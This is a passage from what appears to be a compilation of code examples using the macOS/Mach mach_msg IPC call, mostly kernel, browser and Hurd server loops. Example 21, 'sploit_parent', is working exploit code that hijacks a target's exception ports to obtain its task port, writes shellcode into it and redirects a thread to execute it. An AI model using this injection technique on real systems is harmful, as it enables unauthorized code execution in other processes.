    request->msgh_bits = MACH_MSGH_BITS_SET_PORTS(MACH_MSG_TYPE_COPY_SEND, right_fixup(remote), right_fixup(voucher));
    
    if (is_complex) {
      request->msgh_bits |= MACH_MSGH_BITS_COMPLEX;
      
      // if it's complex we also need to fixup all the descriptors...
      mach_msg_body_t* body = (mach_msg_body_t*)(request+1);
      mach_msg_type_descriptor_t* desc = (mach_msg_type_descriptor_t*)(body+1);
      for (mach_msg_size_t i = 0; i < body->msgh_descriptor_count; i++) {
        switch (desc->type) {
          case MACH_MSG_PORT_DESCRIPTOR: {
            mach_msg_port_descriptor_t* port_desc = (mach_msg_port_descriptor_t*)desc;
            inspect_port(port_desc->name);
            port_desc->disposition = right_fixup(port_desc->disposition);
            desc = (mach_msg_type_descriptor_t*)(port_desc+1);
            break;
          }
            
          case MACH_MSG_OOL_VOLATILE_DESCRIPTOR:
          case MACH_MSG_OOL_DESCRIPTOR: {
            mach_msg_ool_descriptor_t* ool_desc = (mach_msg_ool_descriptor_t*)desc;
            // make sure that deallocate is true; we don't want to keep this memory:
            ool_desc->deallocate = 1;
            desc = (mach_msg_type_descriptor_t*)(ool_desc+1);
            break;
          }

          case MACH_MSG_OOL_PORTS_DESCRIPTOR: {
            mach_msg_ool_ports_descriptor_t* ool_ports_desc = (mach_msg_ool_ports_descriptor_t*)desc;
            // make sure that deallocate is true:
            ool_ports_desc->deallocate = 1;
            ool_ports_desc->disposition = right_fixup(ool_ports_desc->disposition);
            desc = (mach_msg_type_descriptor_t*)(ool_ports_desc+1);
            break;
          }
        }
      }
      
    }
    
    printf("fixed up request, forwarding it\n");
    
    // forward the message:
    err = mach_msg(request,
                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                   request->msgh_size,
                   0,
                   MACH_PORT_NULL,
                   MACH_MSG_TIMEOUT_NONE,
                   MACH_PORT_NULL);
    
    if (err != KERN_SUCCESS) {
      printf("error forwarding service message: %s\n", mach_error_string(err));
      exit(EXIT_FAILURE);
    }
  }
}
Example 18
/*
 * The meat of our exception handler. This thread waits for an exception
 * message, annotates the exception if needed, then forwards it to the
 * previously installed handler (which will likely terminate the process).
 */
static void
MachExceptionHandler()
{
    kern_return_t ret;
    MachExceptionParameters& current = sMachExceptionState.current;
    MachExceptionParameters& previous = sMachExceptionState.previous;

    // We use the simplest kind of 64-bit exception message here.
    ExceptionRequest64 request = {};
    request.header.msgh_local_port = current.port;
    request.header.msgh_size = static_cast<mach_msg_size_t>(sizeof(request));
    ret = mach_msg(&request.header, MACH_RCV_MSG, 0, request.header.msgh_size,
                   current.port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    // Restore the previous handler. We're going to forward to it
    // anyway, and if we crash while doing so we don't want to hang.
    task_set_exception_ports(mach_task_self(), previous.mask, previous.port,
                             previous.behavior, previous.flavor);

    // If we failed even receiving the message, just give up.
    if (ret != MACH_MSG_SUCCESS)
        MOZ_CRASH("MachExceptionHandler: mach_msg failed to receive a message!");

    // Terminate the thread if we're shutting down.
    if (request.header.msgh_id == sIDQuit)
        return;

    // The only other valid message ID is the one associated with the
    // EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES behavior we chose.
    if (request.header.msgh_id != sIDRequest64)
        MOZ_CRASH("MachExceptionHandler: Unexpected Message ID!");

    // Make sure we can understand the exception we received.
    if (request.exception != EXC_BAD_ACCESS || request.code_count != 2)
        MOZ_CRASH("MachExceptionHandler: Unexpected exception type!");

    // Get the address that the offending code tried to access.
    uintptr_t address = uintptr_t(request.code[1]);

    // If the faulting address is inside one of our protected regions, we
    // want to annotate the crash to make it stand out from the crowd.
    if (sProtectedRegions.isProtected(address)) {
        ReportCrashIfDebug("Hit MOZ_CRASH(Tried to access a protected region!)\n");
        MOZ_CRASH_ANNOTATE("MOZ_CRASH(Tried to access a protected region!)");
    }

    // Forward to the previous handler which may be a debugger, the unix
    // signal handler, the crash reporter or something else entirely.
    if (previous.port != MACH_PORT_NULL) {
        mach_msg_type_number_t stateCount;
        thread_state_data_t state;
        if ((uint32_t(previous.behavior) & ~MACH_EXCEPTION_CODES) != EXCEPTION_DEFAULT) {
            // If the previous handler requested thread state, get it here.
            stateCount = THREAD_STATE_MAX;
            ret = thread_get_state(request.thread.name, previous.flavor, state, &stateCount);
            if (ret != KERN_SUCCESS)
                MOZ_CRASH("MachExceptionHandler: Could not get the thread state to forward!");
        }

        // Depending on the behavior of the previous handler, the forwarded
        // exception message will have a different set of fields.
        // Of particular note is that exception handlers that lack
        // MACH_EXCEPTION_CODES will get 32-bit fields even on 64-bit
        // systems. It appears that OSX simply truncates these fields.
        ExceptionRequestUnion forward;
        switch (uint32_t(previous.behavior)) {
          case EXCEPTION_DEFAULT:
             CopyExceptionRequest32(request, forward.r32);
             break;
          case EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES:
             CopyExceptionRequest64(request, forward.r64);
             break;
          case EXCEPTION_STATE:
             CopyExceptionRequestState32(request, forward.rs32,
                                         previous.flavor, stateCount, state);
             break;
          case EXCEPTION_STATE | MACH_EXCEPTION_CODES:
             CopyExceptionRequestState64(request, forward.rs64,
                                         previous.flavor, stateCount, state);
             break;
          case EXCEPTION_STATE_IDENTITY:
             CopyExceptionRequestStateIdentity32(request, forward.rsi32,
                                                 previous.flavor, stateCount, state);
             break;
          case EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES:
             CopyExceptionRequestStateIdentity64(request, forward.rsi64,
                                                 previous.flavor, stateCount, state);
             break;
          default:
             MOZ_CRASH("MachExceptionHandler: Unknown previous handler behavior!");
        }

        // Forward the generated message to the old port. The local and remote
        // port fields *and their rights* are swapped on arrival, so we need to
        // swap them back first.
        forward.header.msgh_bits = (request.header.msgh_bits & ~MACH_MSGH_BITS_PORTS_MASK) |
            MACH_MSGH_BITS(MACH_MSGH_BITS_LOCAL(request.header.msgh_bits),
                           MACH_MSGH_BITS_REMOTE(request.header.msgh_bits));
        forward.header.msgh_local_port = forward.header.msgh_remote_port;
        forward.header.msgh_remote_port = previous.port;
        ret = mach_msg(&forward.header, MACH_SEND_MSG, forward.header.msgh_size, 0,
                       MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
        if (ret != MACH_MSG_SUCCESS)
            MOZ_CRASH("MachExceptionHandler: Failed to forward to the previous handler!");
    } else {
        // There was no previous task-level exception handler, so defer to the
        // host level one instead. We set the return code to KERN_FAILURE to
        // indicate that we did not handle the exception.
        // The reply message ID is always the request ID + 100.
        ExceptionReply reply = {};
        reply.header.msgh_bits =
            MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(request.header.msgh_bits), 0);
        reply.header.msgh_size = static_cast<mach_msg_size_t>(sizeof(reply));
        reply.header.msgh_remote_port = request.header.msgh_remote_port;
        reply.header.msgh_local_port = MACH_PORT_NULL;
        reply.header.msgh_id = request.header.msgh_id + 100;
        reply.NDR = request.NDR;
        reply.RetCode = KERN_FAILURE;
        ret = mach_msg(&reply.header, MACH_SEND_MSG, reply.header.msgh_size, 0,
                       MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
        if (ret != MACH_MSG_SUCCESS)
            MOZ_CRASH("MachExceptionHandler: Failed to forward to the host level!");
    }
}
Example 19
mach_msg_return_t
mach_msg_server(
	boolean_t		(*demux)(mach_msg_header_t *,
					 mach_msg_header_t *),
	mach_msg_size_t		max_size,
	mach_port_t		rcv_name,
	mach_msg_options_t	server_options)
{
	mig_reply_error_t 	*bufRequest, *bufReply, *bufTemp;
	mach_msg_return_t 	mr;
	mach_msg_options_t	options;
	static char here[] =	"mach_msg_server";

	bufRequest = (mig_reply_error_t *)kalloc(max_size + MAX_TRAILER_SIZE);
	if (bufRequest == 0)
		return KERN_RESOURCE_SHORTAGE;
	bufReply = (mig_reply_error_t *)kalloc(max_size + MAX_TRAILER_SIZE);
	if (bufReply == 0)
		return KERN_RESOURCE_SHORTAGE;

	for (;;) {
	    get_request:
		mr = mach_msg(&bufRequest->Head, MACH_RCV_MSG | server_options,
			      0, max_size, rcv_name, MACH_MSG_TIMEOUT_NONE,
			      MACH_PORT_NULL);
		while (mr == MACH_MSG_SUCCESS) {
			/* we have a request message */

			(void) (*demux)(&bufRequest->Head, &bufReply->Head);

			if (!(bufReply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)
			    && bufReply->RetCode != KERN_SUCCESS) {
				if (bufReply->RetCode == MIG_NO_REPLY)
					goto get_request;

				/*
				 * Don't destroy the reply port right,
				 * so we can send an error message
				 */
				bufRequest->Head.msgh_remote_port =
					MACH_PORT_NULL;
				mach_msg_destroy(&bufRequest->Head);
			}

			if (bufReply->Head.msgh_remote_port == MACH_PORT_NULL) {
				/* no reply port, so destroy the reply */
				if (bufReply->Head.msgh_bits &
				    MACH_MSGH_BITS_COMPLEX)
					mach_msg_destroy(&bufReply->Head);

				goto get_request;
			}

			/* send reply and get next request */

			bufTemp = bufRequest;
			bufRequest = bufReply;
			bufReply = bufTemp;

			/*
			 * We don't want to block indefinitely because the
			 * client isn't receiving messages from the reply port.
			 * If we have a send-once right for the reply port,
			 * then this isn't a concern because the send won't
			 * block.
			 * If we have a send right, we need to use
			 * MACH_SEND_TIMEOUT.
			 * To avoid falling off the kernel's fast RPC path
			 * unnecessarily, we only supply MACH_SEND_TIMEOUT when
			 * absolutely necessary.
			 */

			options = MACH_SEND_MSG | MACH_RCV_MSG | server_options;
			if (MACH_MSGH_BITS_REMOTE(bufRequest->Head.msgh_bits)
			    != MACH_MSG_TYPE_MOVE_SEND_ONCE) {
				options |= MACH_SEND_TIMEOUT;
			}
			mr = mach_msg(&bufRequest->Head, options,
				      bufRequest->Head.msgh_size, max_size,
				      rcv_name, MACH_MSG_TIMEOUT_NONE,
				      MACH_PORT_NULL);
		}

		/* a message error occurred */

		switch (mr) {
		    case MACH_SEND_INVALID_DEST:
		    case MACH_SEND_TIMED_OUT:
			/* the reply can't be delivered, so destroy it */
			mach_msg_destroy(&bufRequest->Head);
			break;

		    case MACH_RCV_TOO_LARGE:
			/* the kernel destroyed the request */
			break;

		    default:
			dprintf(("mach_msg_overwrite_trap returned 0x%x %s\n",
				 mr, mach_error_string(mr)));
			Panic("mach_msg failed");
			/* should only happen if the server is buggy */
			kfree((char *) bufRequest, max_size + MAX_TRAILER_SIZE);
			kfree((char *) bufReply, max_size + MAX_TRAILER_SIZE);
			return mr;
		}
	}
}
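For contrast with this kernel-side loop, the user-space Libc mach_msg_server has the same signature and is typically driven like the hedged sketch below; my_subsystem_server stands in for a MIG-generated dispatch stub and is not part of the listing above.

#include <mach/mach.h>

/* Assumed MIG-generated stub: returns TRUE if it recognized the msgh_id
   and filled in the reply. */
extern boolean_t my_subsystem_server(mach_msg_header_t *request,
                                     mach_msg_header_t *reply);

void serve_forever(mach_port_t service_port, mach_msg_size_t max_size)
{
    /* Receives requests, dispatches them through the demux, and sends
       replies, adding MACH_SEND_TIMEOUT only when holding a plain send
       right (as in the loop above). */
    (void)mach_msg_server(my_subsystem_server, max_size, service_port,
                          MACH_MSG_OPTION_NONE);
}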
Example 20
void MachServer::runServerThread(bool doTimeout)
{
	// allocate request/reply buffers
    Message bufRequest(mMaxSize);
    Message bufReply(mMaxSize);
	
	// all exits from runServerThread are through exceptions
	try {
		// register as a worker thread
		perThread().server = this;

		for (;;) {
			// progress hook
			eventDone();
			
			// process all pending timers
			while (processTimer()) {}
		
			// check for worker idle timeout
			{	StLock<Mutex> _(managerLock);
				// record idle thread low-water mark in scan interval
				if (idleCount < leastIdleWorkers)
					leastIdleWorkers = idleCount;
				
				// perform self-timeout processing
				if (doTimeout) {
					if (workerCount > maxWorkerCount)	// someone reduced maxWorkerCount recently...
						break;							// ... so release this thread immediately
					Time::Absolute rightNow = Time::now();
					if (rightNow >= nextCheckTime) {	// reaping period complete; process
						UInt32 idlers = leastIdleWorkers;
                        secinfo("machserver", "reaping workers: %d %d", (uint32_t) workerCount, (uint32_t) idlers);
						nextCheckTime = rightNow + workerTimeout;
						leastIdleWorkers = INT_MAX;
						if (idlers > 1)					// multiple idle threads throughout measuring interval...
							break;						// ... so release this thread now
					}
				}
			}
			
			// determine next timeout (if any)
            bool indefinite = false;
			Time::Interval timeout = workerTimeout;
			{	StLock<Mutex> _(managerLock);
				if (timers.empty()) {
					indefinite = !doTimeout;
				} else {
					timeout = max(Time::Interval(0), timers.next() - Time::now());
					if (doTimeout && workerTimeout < timeout)
						timeout = workerTimeout;
                }
			}

			// receive next IPC request (or wait for timeout)
			mach_msg_return_t mr = indefinite ?
				mach_msg_overwrite(bufRequest,
					MACH_RCV_MSG | mMsgOptions,
					0, mMaxSize, mPortSet,
					MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL,
					(mach_msg_header_t *) 0, 0)
                    :
				mach_msg_overwrite(bufRequest,
					MACH_RCV_MSG | MACH_RCV_TIMEOUT | MACH_RCV_INTERRUPT | mMsgOptions,
					0, mMaxSize, mPortSet,
					mach_msg_timeout_t(timeout.mSeconds()), MACH_PORT_NULL,
					(mach_msg_header_t *) 0, 0);
					
			switch (mr) {
			case MACH_MSG_SUCCESS:
				// process received request message below
				break;
			default:
                secinfo("machserver", "received error: %d", mr);
				continue;
			}
			
			// process received message
			if (bufRequest.msgId() >= MACH_NOTIFY_FIRST &&
				bufRequest.msgId() <= MACH_NOTIFY_LAST) {
				// mach kernel notification message
				// we assume this is quick, so no thread arbitration here
				cdsa_notify_server(bufRequest, bufReply);
			} else {
				// normal request message
				StLock<MachServer, &MachServer::busy, &MachServer::idle> _(*this);
                secinfo("machserver", "begin request: %d, %d", bufRequest.localPort().port(), bufRequest.msgId());
				
				// try subsidiary handlers first
				bool handled = false;
				for (HandlerSet::const_iterator it = mHandlers.begin();
						it != mHandlers.end(); it++)
					if (bufRequest.localPort() == (*it)->port()) {
						(*it)->handle(bufRequest, bufReply);
						handled = true;
					}
				if (!handled) {
					// unclaimed, send to main handler
                    handle(bufRequest, bufReply);
                }

                secinfo("machserver", "end request");
			}

			// process reply generated by handler
            if (!(bufReply.bits() & MACH_MSGH_BITS_COMPLEX) &&
                bufReply.returnCode() != KERN_SUCCESS) {
                    if (bufReply.returnCode() == MIG_NO_REPLY)
						continue;
                    // don't destroy the reply port right, so we can send an error message
                    bufRequest.remotePort(MACH_PORT_NULL);
                    mach_msg_destroy(bufRequest);
            }

            if (bufReply.remotePort() == MACH_PORT_NULL) {
                // no reply port, so destroy the reply
                if (bufReply.bits() & MACH_MSGH_BITS_COMPLEX)
                    bufReply.destroy();
                continue;
            }

            /*
             *  We don't want to block indefinitely because the client
             *  isn't receiving messages from the reply port.
             *  If we have a send-once right for the reply port, then
             *  this isn't a concern because the send won't block.
             *  If we have a send right, we need to use MACH_SEND_TIMEOUT.
             *  To avoid falling off the kernel's fast RPC path unnecessarily,
             *  we only supply MACH_SEND_TIMEOUT when absolutely necessary.
             */
			mr = mach_msg_overwrite(bufReply,
                          (MACH_MSGH_BITS_REMOTE(bufReply.bits()) ==
                                                MACH_MSG_TYPE_MOVE_SEND_ONCE) ?
                          MACH_SEND_MSG | mMsgOptions :
                          MACH_SEND_MSG | MACH_SEND_TIMEOUT | mMsgOptions,
                          bufReply.length(), 0, MACH_PORT_NULL,
                          0, MACH_PORT_NULL, NULL, 0);
			switch (mr) {
			case MACH_MSG_SUCCESS:
				break;
			default:
                secinfo("machserver", "send error: %d %d", mr, bufReply.remotePort().port());
				bufReply.destroy();
				break;
			}

            
            // clean up after the transaction
            releaseDeferredAllocations();
        }
		perThread().server = NULL;
		
	} catch (...) {
		perThread().server = NULL;
		throw;
	}
}
Example 21
// return 0 to try again
int sploit_parent(mach_port_t child_task_port, mach_port_t exception_port) {
    kern_return_t err;
    kern_return_t set_exception_ports_err = KERN_SUCCESS;

    while (set_exception_ports_err == KERN_SUCCESS) {
        set_exception_ports_err = task_set_exception_ports(
                                      child_task_port,
                                      EXC_MASK_ALL,
                                      exception_port,
                                      EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES,  // we want to receive a catch_exception_raise message
                                      THREAD_STATE_NONE);
    }

    // setting the exception port has now started failing
    // try to receive a message; use a timeout because we may have lost the race and need to try again:

    size_t size = 0x1000;
    struct exception_raise_msg* request = malloc(size);
    memset(request, 0, size);

    err = mach_msg(&request->Head,
                   MACH_RCV_MSG | MACH_RCV_TIMEOUT,
                   0,
                   size,
                   exception_port,
                   10, // 10ms timeout
                   0);

    if (err != KERN_SUCCESS) {
        printf("[-] failed to receive message on exception port - trying again (%s)\n", mach_error_string(err));
        return 0;
    }

    // we got it!
    printf("[+] got exception message with target's task and thread ports\n");
    mach_port_t target_task = request->task.name;
    mach_port_t target_thread = request->thread.name;

    // allocate some memory in the task
    mach_vm_address_t shellcode_addr = 0;
    err = mach_vm_allocate(target_task,
                           &shellcode_addr,
                           0x1000,
                           VM_FLAGS_ANYWHERE);

    if (err != KERN_SUCCESS) {
        printf("[-] mach_vm_allocate: %s\n", mach_error_string(err));
        return 1;
    }
    printf("[+] allocated shellcode in target at %llx\n", shellcode_addr);

    // write the shellcode there:
    err = mach_vm_write(target_task,
                        shellcode_addr,
                        (vm_offset_t)sc,
                        sizeof(sc));

    if (err != KERN_SUCCESS) {
        printf("[-] mach_vm_write: %s\n", mach_error_string(err));
        return 1;
    }

    // make it executable
    err = mach_vm_protect(target_task,
                          shellcode_addr,
                          0x1000,
                          0,
                          VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE); // also writeable because we put the stack there

    if (err != KERN_SUCCESS) {
        printf("[-] mach_vm_protect: %s\n", mach_error_string(err));
        return 1;
    }

    // set the thread state to point to the shellcode
    x86_thread_state64_t state;
    mach_msg_type_number_t stateCount = x86_THREAD_STATE64_COUNT;

    memset(&state, 0, sizeof(state));

    state.__rip = (uint64_t)shellcode_addr;
    state.__rsp = (uint64_t)shellcode_addr + 0x800; // the shellcode uses the stack

    err = thread_set_state(target_thread,
                           x86_THREAD_STATE64,
                           (thread_state_t)&state,
                           stateCount);

    if (err != KERN_SUCCESS) {
        printf("[-] thread_set_state: %s\n", mach_error_string(err));
        return 1;
    }

    // reply to the exception message
    struct exception_reply_msg reply = {0};
    reply.Head.msgh_remote_port = request->Head.msgh_remote_port;
    reply.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(request->Head.msgh_bits), 0);
    reply.Head.msgh_id = request->Head.msgh_id + 100;
    reply.Head.msgh_size = sizeof(reply);
    reply.NDR = NDR_record;
    reply.RetCode = MACH_MSG_SUCCESS;

    err = mach_msg(&reply.Head,
                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                   (mach_msg_size_t)sizeof(reply),
                   0,
                   MACH_PORT_NULL,
                   MACH_MSG_TIMEOUT_NONE,
                   MACH_PORT_NULL);

    if (err != KERN_SUCCESS) {
        printf("[-] mach_msg sending reply to exception message: %s\n", mach_error_string(err));
        return 1;
    }

    return 1;
}
Example 22
/*
 *	Routine:	ipc_mqueue_send
 *	Purpose:
 *		Send a message to a message queue.  The message holds a reference
 *		for the destination port for this message queue in the 
 *		msgh_remote_port field.
 *
 *		If unsuccessful, the caller still has possession of
 *		the message and must do something with it.  If successful,
 *		the message is queued, given to a receiver, or destroyed.
 *	Conditions:
 *		mqueue is locked.
 *	Returns:
 *		MACH_MSG_SUCCESS	The message was accepted.
 *		MACH_SEND_TIMED_OUT	Caller still has message.
 *		MACH_SEND_INTERRUPTED	Caller still has message.
 */
mach_msg_return_t
ipc_mqueue_send(
	ipc_mqueue_t		mqueue,
	ipc_kmsg_t		kmsg,
	mach_msg_option_t	option,
	mach_msg_timeout_t	send_timeout,
	spl_t			s)
{
	int wresult;

	/*
	 *  Don't block if:
	 *	1) We're under the queue limit.
	 *	2) Caller used the MACH_SEND_ALWAYS internal option.
	 *	3) Message is sent to a send-once right.
	 */
	if (!imq_full(mqueue) ||
	    (!imq_full_kernel(mqueue) && 
	     ((option & MACH_SEND_ALWAYS) ||
	      (MACH_MSGH_BITS_REMOTE(kmsg->ikm_header->msgh_bits) ==
	       MACH_MSG_TYPE_PORT_SEND_ONCE)))) {
		mqueue->imq_msgcount++;
		assert(mqueue->imq_msgcount > 0);
		imq_unlock(mqueue);
		splx(s);
	} else {
		thread_t cur_thread = current_thread();
		uint64_t deadline;

		/* 
		 * We have to wait for space to be granted to us.
		 */
		if ((option & MACH_SEND_TIMEOUT) && (send_timeout == 0)) {
			imq_unlock(mqueue);
			splx(s);
			return MACH_SEND_TIMED_OUT;
		}
		if (imq_full_kernel(mqueue)) {
			imq_unlock(mqueue);
			splx(s);
			return MACH_SEND_NO_BUFFER;
		}
		mqueue->imq_fullwaiters = TRUE;
		thread_lock(cur_thread);
		if (option & MACH_SEND_TIMEOUT)
			clock_interval_to_deadline(send_timeout, 1000*NSEC_PER_USEC, &deadline);
		else
			deadline = 0;
		wresult = wait_queue_assert_wait64_locked(
						&mqueue->imq_wait_queue,
						IPC_MQUEUE_FULL,
						THREAD_ABORTSAFE,
						TIMEOUT_URGENCY_USER_NORMAL,
						deadline, 0,
						cur_thread);
		thread_unlock(cur_thread);
		imq_unlock(mqueue);
		splx(s);
		
		if (wresult == THREAD_WAITING) {
			wresult = thread_block(THREAD_CONTINUE_NULL);
			counter(c_ipc_mqueue_send_block++);
		}
		
		switch (wresult) {
		case THREAD_TIMED_OUT:
			assert(option & MACH_SEND_TIMEOUT);
			return MACH_SEND_TIMED_OUT;
			
		case THREAD_AWAKENED:
			/* we can proceed - inherited msgcount from waker */
			assert(mqueue->imq_msgcount > 0);
			break;
			
		case THREAD_INTERRUPTED:
			return MACH_SEND_INTERRUPTED;
			
		case THREAD_RESTART:
			/* mqueue is being destroyed */
			return MACH_SEND_INVALID_DEST;
		default:
			panic("ipc_mqueue_send");
		}
	}

	ipc_mqueue_post(mqueue, kmsg);
	return MACH_MSG_SUCCESS;
}
Example 23
void
ports_manage_port_operations_one_thread (struct port_bucket *bucket,
					 ports_demuxer_type demuxer,
					 int timeout)
{
  error_t err;

  int 
  internal_demuxer (mach_msg_header_t *inp,
		    mach_msg_header_t *outheadp)
    {
      struct port_info *pi;
      struct rpc_info link;
      int status;
      error_t err;
      register mig_reply_header_t *outp = (mig_reply_header_t *) outheadp;
      static const mach_msg_type_t RetCodeType = {
		/* msgt_name = */		MACH_MSG_TYPE_INTEGER_32,
		/* msgt_size = */		32,
		/* msgt_number = */		1,
		/* msgt_inline = */		TRUE,
		/* msgt_longform = */		FALSE,
		/* msgt_deallocate = */		FALSE,
		/* msgt_unused = */		0
	};

      /* Fill in default response. */
      outp->Head.msgh_bits 
	= MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(inp->msgh_bits), 0);
      outp->Head.msgh_size = sizeof *outp;
      outp->Head.msgh_remote_port = inp->msgh_remote_port;
      outp->Head.msgh_local_port = MACH_PORT_NULL;
      outp->Head.msgh_seqno = 0;
      outp->Head.msgh_id = inp->msgh_id + 100;
      outp->RetCodeType = RetCodeType;
      outp->RetCode = MIG_BAD_ID;

      pi = ports_lookup_port (bucket, inp->msgh_local_port, 0);
      if (pi)
	{
	  err = ports_begin_rpc (pi, inp->msgh_id, &link);
	  if (err)
	    {
	      mach_port_deallocate (mach_task_self (), inp->msgh_remote_port);
	      outp->RetCode = err;
	      status = 1;
	    }
	  else
	    {
	      /* No need to check cancel threshold here, because
		 in a single threaded server the cancel is always
		 handled in order. */
	      status = demuxer (inp, outheadp);
	      ports_end_rpc (pi, &link);
	    }
	  ports_port_deref (pi);
	}
      else
	{
	  outp->RetCode = EOPNOTSUPP;
	  status = 1;
	}

      return status;
    }
  
  do
    err = mach_msg_server_timeout (internal_demuxer, 0, bucket->portset, 
				   timeout ? MACH_RCV_TIMEOUT : 0, timeout);
  while (err != MACH_RCV_TIMED_OUT);
}
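A hedged sketch of how a Hurd translator typically drives the single-threaded libports loop above; my_demuxer stands in for whatever demuxer the translator provides (usually a wrapper around one or more MIG *_server routines) and is not part of the listing.

#include <hurd/ports.h>

extern int my_demuxer (mach_msg_header_t *inp, mach_msg_header_t *outp);

void
run_translator (void)
{
  struct port_bucket *bucket = ports_create_bucket ();

  /* timeout == 0: block indefinitely between incoming requests. */
  ports_manage_port_operations_one_thread (bucket, my_demuxer, 0);
}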
Example 24
ipc_kmsg_t
ipc_kobject_server(
	ipc_kmsg_t	request,
	mach_msg_option_t __unused option)
{
	mach_msg_size_t reply_size;
	ipc_kmsg_t reply;
	kern_return_t kr;
	ipc_port_t *destp;
	ipc_port_t  replyp = IPC_PORT_NULL;
	mach_msg_format_0_trailer_t *trailer;
	mig_hash_t *ptr;
	task_t task = TASK_NULL;
	uint32_t exec_token;
	boolean_t exec_token_changed = FALSE;

	/*
	 * Find out corresponding mig_hash entry if any
	 */
	{
	    int key = request->ikm_header->msgh_id;
	    unsigned int i = (unsigned int)MIG_HASH(key);
	    int max_iter = mig_table_max_displ;

	    do {
		ptr = &mig_buckets[i++ % MAX_MIG_ENTRIES];
	    } while (key != ptr->num && ptr->num && --max_iter);

	    if (!ptr->routine || key != ptr->num) {
	        ptr = (mig_hash_t *)0;
		reply_size = mig_reply_size;
	    } else {
		reply_size = ptr->size;
#if	MACH_COUNTER
		ptr->callcount++;
#endif
	    }
	}

	/* round up for trailer size */
        reply_size += MAX_TRAILER_SIZE;
	reply = ipc_kmsg_alloc(reply_size);

	if (reply == IKM_NULL) {
		printf("ipc_kobject_server: dropping request\n");
		ipc_kmsg_trace_send(request, option);
		ipc_kmsg_destroy(request);
		return IKM_NULL;
	}

	/*
	 * Initialize reply message.
	 */
	{
#define	InP	((mach_msg_header_t *) request->ikm_header)
#define	OutP	((mig_reply_error_t *) reply->ikm_header)

	    /* 
	     * MIG should really assure no data leakage -
	     * but until it does, pessimistically zero the
	     * whole reply buffer.
	     */
	    bzero((void *)OutP, reply_size);

	    OutP->NDR = NDR_record;
	    OutP->Head.msgh_size = sizeof(mig_reply_error_t);

	    OutP->Head.msgh_bits =
		MACH_MSGH_BITS_SET(MACH_MSGH_BITS_LOCAL(InP->msgh_bits), 0, 0, 0);
	    OutP->Head.msgh_remote_port = InP->msgh_local_port;
	    OutP->Head.msgh_local_port = MACH_PORT_NULL;
	    OutP->Head.msgh_voucher_port = MACH_PORT_NULL;
	    OutP->Head.msgh_id = InP->msgh_id + 100;

#undef	InP
#undef	OutP
	}

	/*
	 * Find the routine to call, and call it
	 * to perform the kernel function
	 */
	ipc_kmsg_trace_send(request, option);
	{
	    if (ptr) {
		/*
		 * Check if the port is a task port, if its a task port then
		 * snapshot the task exec token before the mig routine call.
		 */
		ipc_port_t port = request->ikm_header->msgh_remote_port;
		if (IP_VALID(port) && ip_kotype(port) == IKOT_TASK) {
			task = convert_port_to_task_with_exec_token(port, &exec_token);
		}

		(*ptr->routine)(request->ikm_header, reply->ikm_header);

		/* Check if the exec token changed during the mig routine */
		if (task != TASK_NULL) {
			if (exec_token != task->exec_token) {
				exec_token_changed = TRUE;
			}
			task_deallocate(task);
		}

		kernel_task->messages_received++;
	    }
	    else {
		if (!ipc_kobject_notify(request->ikm_header, reply->ikm_header)){
#if DEVELOPMENT || DEBUG
		    printf("ipc_kobject_server: bogus kernel message, id=%d\n",
			request->ikm_header->msgh_id);
#endif	/* DEVELOPMENT || DEBUG */
		    _MIG_MSGID_INVALID(request->ikm_header->msgh_id);

		    ((mig_reply_error_t *) reply->ikm_header)->RetCode
			= MIG_BAD_ID;
		}
		else
		  kernel_task->messages_received++;
	    }
	    kernel_task->messages_sent++;
	}

	/*
	 *	Destroy destination. The following code differs from
	 *	ipc_object_destroy in that we release the send-once
	 *	right instead of generating a send-once notification
	 * 	(which would bring us here again, creating a loop).
	 *	It also differs in that we only expect send or
	 *	send-once rights, never receive rights.
	 *
	 *	We set msgh_remote_port to IP_NULL so that the kmsg
	 *	destroy routines don't try to destroy the port twice.
	 */
	destp = (ipc_port_t *) &request->ikm_header->msgh_remote_port;
	switch (MACH_MSGH_BITS_REMOTE(request->ikm_header->msgh_bits)) {
		case MACH_MSG_TYPE_PORT_SEND:
		    ipc_port_release_send(*destp);
		    break;
		
		case MACH_MSG_TYPE_PORT_SEND_ONCE:
		    ipc_port_release_sonce(*destp);
		    break;
		
		default:
		    panic("ipc_kobject_server: strange destination rights");
	}
	*destp = IP_NULL;

	/*
	 *	Destroy voucher.  The kernel MIG servers never take ownership
	 *	of vouchers sent in messages.  Swallow any such rights here.
	 */
	if (IP_VALID(request->ikm_voucher)) {
		assert(MACH_MSG_TYPE_PORT_SEND ==
		       MACH_MSGH_BITS_VOUCHER(request->ikm_header->msgh_bits));
		ipc_port_release_send(request->ikm_voucher);
		request->ikm_voucher = IP_NULL;
	}

        if (!(reply->ikm_header->msgh_bits & MACH_MSGH_BITS_COMPLEX) &&
           ((mig_reply_error_t *) reply->ikm_header)->RetCode != KERN_SUCCESS)
	 	kr = ((mig_reply_error_t *) reply->ikm_header)->RetCode;
	else
		kr = KERN_SUCCESS;

	if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) {
		/*
		 *	The server function is responsible for the contents
		 *	of the message.  The reply port right is moved
		 *	to the reply message, and we have deallocated
		 *	the destination port right, so we just need
		 *	to free the kmsg.
		 */
		ipc_kmsg_free(request);

	} else {
		/*
		 *	The message contents of the request are intact.
		 *	Destroy everything except the reply port right,
		 *	which is needed in the reply message.
		 */
		request->ikm_header->msgh_local_port = MACH_PORT_NULL;
		ipc_kmsg_destroy(request);
	}

	replyp = (ipc_port_t)reply->ikm_header->msgh_remote_port;

	if (kr == MIG_NO_REPLY) {
		/*
		 *	The server function will send a reply message
		 *	using the reply port right, which it has saved.
		 */

		ipc_kmsg_free(reply);

		return IKM_NULL;
